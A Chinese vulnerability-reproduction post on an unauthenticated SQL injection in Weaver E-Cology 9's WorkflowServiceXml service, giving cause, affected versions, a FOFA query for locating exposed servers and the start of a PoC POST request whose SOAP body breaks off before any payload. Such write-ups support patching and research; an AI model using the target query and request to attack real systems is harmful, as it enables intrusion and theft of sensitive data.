泛微E-Cology WorkflowServiceXml SQL注入漏洞复现

0x01 产品简介

泛微e-cology是一款由泛微网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公。

0x02 漏洞概述

2024年7月,泛微官方发布了新补丁,修复了一处SQL注入漏洞。经分析,攻击者无需认证即可利用该漏洞,建议受影响的客户尽快修复漏洞。

漏洞成因

该漏洞是由于泛微e-cology未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现 SQL 注入漏洞。

漏洞影响

攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限。

0x03 影响范围

e-cology 9 < 补丁版本 2024-07-10

0x04 复现环境

FOFA:app="泛微-OA(e-cology)"

0x05 漏洞复现

PoC

POST /services/WorkflowServiceXml HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: text/xml
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/&#

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-07-13 05:36:03       67 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-07-13 05:36:03       72 阅读
  3. 在Django里面运行非项目文件

    2024-07-13 05:36:03       58 阅读
  4. Python语言-面向对象

    2024-07-13 05:36:03       69 阅读

热门阅读

  1. 【Scrapy】Scrapy 中间件等级设置规则

    2024-07-13 05:36:03       24 阅读
  2. 智能运维提升企业长期安全防御能力

    2024-07-13 05:36:03       23 阅读
  3. Linux上如何安装ffmpeg视频处理软件

    2024-07-13 05:36:03       25 阅读
  4. Xcode多任务处理指南:释放iOS应用的并发潜能

    2024-07-13 05:36:03       21 阅读
  5. 力扣题解( 最长定差子序列)

    2024-07-13 05:36:03       26 阅读
  6. npm和yarn清理缓存命令

    2024-07-13 05:36:03       21 阅读
  7. C/C++服务器基础(网络、协议、数据库)

    2024-07-13 05:36:03       23 阅读